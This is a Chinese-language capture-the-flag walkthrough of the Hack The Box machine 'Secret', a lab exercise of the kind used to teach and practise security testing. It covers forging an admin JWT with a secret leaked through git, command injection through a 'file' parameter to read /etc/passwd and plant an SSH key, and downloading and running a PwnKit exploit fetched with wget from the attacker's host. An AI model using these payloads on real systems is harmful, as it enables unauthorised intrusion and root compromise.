[Hack The Box] HTB—Secret walkthrough
machine :Hack The Box—Secret
HTB—Secret
一、信息搜集
nmap
nmap -sV 10.10.11.120
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
3000/tcp open http Node.js (Express middleware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
深度扫描开放端口
nmap -sC -sV -n -T5 -p 22,80,3000 10.10.11.120
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:af:61:44:10:89:b9:53:f0:80:3f:d7:19:b1:e2:9c (RSA)
| 256 95:ed:65:8d:cd:08:2b:55:dd:17:51:31:1e:3e:18:12 (ECDSA)
|_ 256 33:7b:c1:71:d3:33:0f:92:4e:83:5a:1f:52:02:93:5e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: DUMB Docs
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp open http Node.js (Express middleware)
|_http-title: DUMB Docs
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
二、网站渗透
照着文档写得,curl注册
curl -i -X POST \
-H 'Content-Type: application/json' \
-d '{"name":"xiaozz", "email":"xiaoz@dasith.works", "password":"xiaoz1234"}' \
http://10.10.11.120:3000/api/user/register
登陆
curl -i -X POST \
-H 'Content-Type: application/json' \
-d '{"email":"xiaoz@dasith.works", "password":"xiaoz1234"}' \
http://10.10.11.120:3000/api/user/login
auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoieGlhb3p6IiwiZW1haWwiOiJ4aWFvekBkYXNpdGgud29ya3MiLCJpYXQiOjE2NDU2Njk2NDZ9.dQlJD5uraui5jzOJRvqdJ_5c4PARMhbYbMW-pAz4Ixs
认证
1.jwt伪造
我们需要admin权限,尝试jwt绕过 jwt.io
翻到密钥在.env中
DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
TOKEN_SECRET = secret
TOKEN_SECRET = secret
不对,发现有git泄露,尝试用.git恢复,这里我找到一个方便的工具:gakki429/Git_Extract: 提取远程 git 泄露或本地 git 的工具 (github.com)
python2 git_extract.py ../.git
找到真正的TOKEN_SECRET
DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
TOKEN_SECRET = gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE
连系代码local-web\routes\private.js
router.get('/logs', verifytoken, (req, res) => {
const file = req.query.file;
const userinfo = { name: req.user }
const name = userinfo.name.name;
if (name == 'theadmin'){
const getLogs = `git log --oneline ${file}`;
exec(getLogs, (err , output) =>{
if(err){
res.status(500).send(err);
return
}
res.json(output);
})
}
else{
res.json({
role: {
role: "you are normal user",
desc: userinfo.name.name
}
})
}
})
name == 'theadmin'
修改jwt
admin的jwt
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRoZWFkbWluQGRhc2l0aC53b3JrcyIsImlhdCI6MTY0NTY2OTY0Nn0.La5fUzvIGE9T_ibOX37_D_ImqzR3fW6RjGMcr4wiRW4
成功登陆admin,登陆后看http://10.10.11.120:3000/api/logs
2.命令执行
const getLogs = git log --oneline ${file};
private.js这段代码会有一个命令执行
http://10.10.11.120:3000/api/logs?file=123;whoami;
反弹shell失败,看别人wp是写入ssh公钥(因为看etc/passwd,我们现在这个用户是有登陆权限的)
curl -i \
-H 'auth-token:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRoZWFkbWluQGRhc2l0aC53b3JrcyIsImlhdCI6MTY0NTY2OTY0Nn0.La5fUzvIGE9T_ibOX37_D_ImqzR3fW6RjGMcr4wiRW4' \
'http://10.10.11.120/api/logs?file=index.js;id;cat+/etc/passwd' | sed 's/\\n/\n/g'
利用sed 's/\\n/\n/g'
换行输出
3.写入ssh公钥
kali攻击机上:
ssh-keygen -t rsa //在攻击机上生成ssh公钥和私钥,密码设置为空
cd /root/.ssh
export PUBLIC_KEY=$(cat id_rsa.pub) //将公钥的内容存储到 bash 变量中
然后执行命令
mkdir -p /home/dasith/.ssh
echo $PUBLIC_KEY >> /home/dasith/.ssh/authorized_keys
curl
curl -i \ //-i 显示返回的headers
-H 'auth-token:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRoZWFkbWluQGRhc2l0aC53b3JrcyIsImlhdCI6MTY0NTY2OTY0Nn0.La5fUzvIGE9T_ibOX37_D_ImqzR3fW6RjGMcr4wiRW4' \
-G \ //以get传数据file
--data-urlencode "file=123;mkdir -p /home/dasith/.ssh;echo $PUBLIC_KEY >> /home/dasith/.ssh/authorized_keys"\ //url编码
'http://10.10.11.120/api/logs'
ssh登陆
ssh dasith@10.10.11.120
得到user flag
三、提权
老样子linpeas.sh
有pkexec提权的CVE-2021-4034
开个http server
python3 -m http.server 8080
传文件过去
wget http://10.10.14.25:8080/Makefile
wget http://10.10.14.25:8080/cve-2021-4034.c
wget http://10.10.14.25:8080/pwnkit.c
make
./cve-2021-4034
得到root flag
参考wp:
https://drt.sh/posts/htb-secret/